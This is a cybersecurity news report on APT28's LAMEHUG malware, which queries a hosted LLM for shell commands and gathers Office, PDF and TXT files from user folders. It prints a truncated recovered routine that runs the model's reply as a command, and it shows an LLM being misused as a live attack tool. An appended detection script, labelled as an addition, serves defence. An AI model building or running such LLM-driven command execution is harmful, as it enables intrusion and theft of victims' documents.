The newly revealed LAMEHUG campaign signals a watershed moment for cyber defense: Russian state-aligned APT28 has fused a large language model (LLM) directly into live malware, allowing each infected host to receive tailor-made shell commands on the fly. By invoking the Qwen2.5-Coder-32B-Instruct model through Hugging Face's public API, the attackers sidestep traditional static payload constraints and achieve unprecedented flexibility.

Cato Networks analysts who reverse-engineered multiple samples quickly identified the malware's hallmark: every binary embeds base64-encoded prompts that are sent verbatim to the cloud-hosted LLM, which then returns an executable command string tailored to the host environment. The recovered routine (the listing is truncated in the source; prompt_b64_p1 and query_text are defined elsewhere in the binary):

    from base64 import b64decode
    import subprocess

    def LLM_QUERY_EX():
        # The embedded, base64-encoded prompt is decoded and sent as a single user turn.
        prompt = {
            'messages': [{'role': 'user', 'content': b64decode(prompt_b64_p1).decode()}],
            'temperature': 0.1,
            'model': 'Qwen/Qwen2.5-Coder-32B-Instruct',
        }
        # The model's reply is taken as the command string to run on the host.
        cmd = query_text(prompt)
        # subprocess.  (listing truncated in the source)

A second prompt follows, ordering the recursive collection of Office, PDF, and TXT files from the user's Documents, Downloads, and Desktop directories into the same staging folder.

By delegating command synthesis to the cloud model, the binary remains compact, and any blue-team attempt to pattern-match on hard-coded strings is defeated. Prompt editing also grants the operators instant control over reconnaissance depth and exfiltration scope without redeploying code, a boon for rapidly shifting operational requirements. Unless defenders monitor outbound AI queries or impose least-privilege egress rules, LAMEHUG's modular architecture guarantees the operators fresh system insight with every execution cycle.
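One way to implement the outbound-AI-query monitoring the article calls for, as an added example that is not part of the original article or of Cato's analysis: it scans constructed JSON-lines records from a TLS-inspecting proxy and flags inference-API requests made by non-interactive processes, plus prompts that ask the model for executable commands. The endpoint watch-list, process allow-list, record fields and prompt regex are assumptions.

```python
import json
import re

# Constructed watch-list of hosted LLM inference endpoints (assumption; extend from your proxy data).
AI_API_HOSTS = {"api-inference.huggingface.co", "llm.example-provider.invalid"}
# Constructed allow-list of processes expected to reach AI services interactively.
INTERACTIVE_PROCS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Heuristic (assumed) for prompts that request runnable commands rather than text.
CMD_PROMPT = re.compile(r"\b(shell|cmd|powershell|bash)\b.*\bcommand", re.I)

def classify(event: dict) -> list[str]:
    """Return the detection reasons that apply to one proxy record (empty = benign)."""
    reasons = []
    if event["dst_host"] not in AI_API_HOSTS:
        return reasons
    if event["proc"].lower() not in INTERACTIVE_PROCS:
        reasons.append("llm-api-from-non-interactive-process")
    try:
        body = json.loads(event.get("body") or "{}")
    except json.JSONDecodeError:
        return reasons  # opaque or non-JSON body: keep the process-based verdict only
    msgs = body.get("messages", []) if isinstance(body, dict) else []
    if any(CMD_PROMPT.search(str(m.get("content", ""))) for m in msgs):
        reasons.append("prompt-requests-executable-commands")
    return reasons

def scan(log_lines: list[str]) -> list[dict]:
    """Run classify over JSON-lines proxy records; one alert per flagged record."""
    alerts = []
    for line in log_lines:
        ev = json.loads(line)
        if reasons := classify(ev):
            alerts.append({"ts": ev["ts"], "host": ev["src_host"],
                           "proc": ev["proc"], "reasons": reasons})
    return alerts

# Constructed sample records (not real telemetry); body is the decrypted request JSON.
_RECORDS = [
    {"ts": "2025-07-24T09:01:02Z", "src_host": "ws-17", "proc": "chrome.exe",
     "dst_host": "api-inference.huggingface.co",
     "body": json.dumps({"messages": [{"role": "user", "content": "summarise this report"}]})},
    {"ts": "2025-07-24T09:03:10Z", "src_host": "ws-17", "proc": "svc_update.exe",
     "dst_host": "api-inference.huggingface.co",
     "body": json.dumps({"messages": [{"role": "user", "content":
             "Return one shell command that lists the hardware and network configuration"}],
                         "model": "Qwen/Qwen2.5-Coder-32B-Instruct"})},
    {"ts": "2025-07-24T09:04:00Z", "src_host": "ws-22", "proc": "outlook.exe",
     "dst_host": "update.example.invalid", "body": ""},
]
SAMPLE_LOG = [json.dumps(r) for r in _RECORDS]
```

Only the second record is flagged, on both reasons; a browser session to the same endpoint and unrelated traffic stay silent.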
Early telemetry shows Ukrainian government workstations were the initial testbed, reinforcing long-standing observations that APT28 often pilots experimental tooling against Kyiv before wider use. Once opened, a decoy PDF appears while the hidden binary executes in the background, ensuring the victim remains unaware of the breach.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 24 Jul 2025 16:55:22 +0000